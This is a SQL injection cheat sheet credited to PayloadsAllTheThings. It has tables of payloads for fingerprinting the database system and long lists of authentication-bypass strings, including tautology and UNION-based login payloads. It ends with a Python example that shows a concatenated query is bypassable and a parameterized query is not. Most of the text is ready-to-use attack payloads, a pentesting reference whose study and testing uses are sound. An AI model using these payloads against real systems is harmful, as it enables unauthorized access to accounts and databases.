SQL Injection

SQL Injection (SQLi) is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. SQL Injection is one of the most common and severe types of web application vulnerabilities, enabling attackers to execute arbitrary SQL code on the database. This can lead to unauthorized data access, data manipulation, and, in some cases, full compromise of the database server.

DBMS Identification

Certain SQL functions and keywords exist only in a particular database management system (DBMS). Each payload below is a condition that is valid (and true) only on the DBMS it targets; by submitting it in a SQL injection attempt and observing how the website responds (a normal page versus an error or an empty result), you can often determine the type of DBMS in use.

| DBMS       | SQL Payload                                         |
| ---------- | --------------------------------------------------- |
| MySQL      | conv('a',16,2)=conv('a',16,2)                       |
| MySQL      | connection_id()=connection_id()                     |
| MySQL      | crc32('MySQL')=crc32('MySQL')                       |
| MSSQL      | BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)           |
| MSSQL      | @@CONNECTIONS>0                                     |
| MSSQL      | @@CONNECTIONS=@@CONNECTIONS                         |
| MSSQL      | @@CPU_BUSY=@@CPU_BUSY                               |
| MSSQL      | USER_ID(1)=USER_ID(1)                               |
| ORACLE     | ROWNUM=ROWNUM                                       |
| ORACLE     | RAWTOHEX('AB')=RAWTOHEX('AB')                       |
| ORACLE     | LNNVL(0=123)                                        |
| POSTGRESQL | 5::int=5                                            |
| POSTGRESQL | 5::integer=5                                        |
| POSTGRESQL | pg_client_encoding()=pg_client_encoding()           |
| POSTGRESQL | get_current_ts_config()=get_current_ts_config()     |
| POSTGRESQL | quote_literal(42.5)=quote_literal(42.5)             |
| POSTGRESQL | current_database()=current_database()               |
| SQLITE     | sqlite_version()=sqlite_version()                   |
| SQLITE     | last_insert_rowid()>1                               |
| SQLITE     | last_insert_rowid()=last_insert_rowid()             |
| MSACCESS   | val(cvar(1))=1                                      |
| MSACCESS   | IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0                   |

DBMS Identification (Error-Based)

Different DBMSs return distinct error messages when they encounter issues. By triggering errors and examining the specific messages sent back by the database, you can often identify the type of DBMS the website is using.

| DBMS                 | Example Error Message                                                                      | Example Payload |
| -------------------- | ------------------------------------------------------------------------------------------ | --------------- |
| MySQL                | You have an error in your SQL syntax; ... near '' at line 1                                | '               |
| PostgreSQL           | ERROR: unterminated quoted string at or near "'"                                           | '               |
| PostgreSQL           | ERROR: syntax error at or near "1"                                                         | 1'              |
| Microsoft SQL Server | Unclosed quotation mark after the character string ''.                                     | '               |
| Microsoft SQL Server | Incorrect syntax near ''.                                                                  | '               |
| Microsoft SQL Server | The conversion of the varchar value to data type int resulted in an out-of-range value.    | 1'              |
| Oracle               | ORA-00933: SQL command not properly ended                                                  | '               |
| Oracle               | ORA-01756: quoted string not properly terminated                                           | '               |
| Oracle               | ORA-00923: FROM keyword not found where expected                                           | 1'              |

Auth Payloads

admin' OR '1'='1
admin' OR 1=1
admin" OR "1"="1
admin" OR 1=1
' OR '1'='1
' OR 1=1
" OR "1"="1
" OR 1=1
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1' or 1.e(1) or '1'='1
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
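The payloads above only work because user input is spliced into the query text. As an added example (not code from PayloadsAllTheThings), here is a minimal login check in Python against an in-memory SQLite database, written both ways: the concatenated form, which `admin' OR '1'='1` bypasses, and the parameterized form, which treats the same input as plain data. The table, the user row and the password are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed sample database: one user, plaintext password for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret-example')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation: the input becomes SQL.

    With username "admin' OR '1'='1" the WHERE clause becomes
        username = 'admin' OR '1'='1' AND password = '...'
    and AND binds tighter than OR, so the username match alone is enough.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Binds the inputs as parameters: quotes and OR are just characters."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Return (vulnerable_result, parameterized_result) for the same input."""
    conn = make_db()
    return (
        login_vulnerable(conn, username, password),
        login_parameterized(conn, username, password),
    )


if __name__ == "__main__":
    for creds in [("admin", "s3cret-example"),
                  ("admin' OR '1'='1", "wrong"),
                  ("' OR '1'='1", "' OR '1'='1")]:
        print(creds, "->", compare(*creds))
```

Only the concatenated version logs in with the injected username; valid credentials succeed in both.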

Sources

PayloadsAllTheThings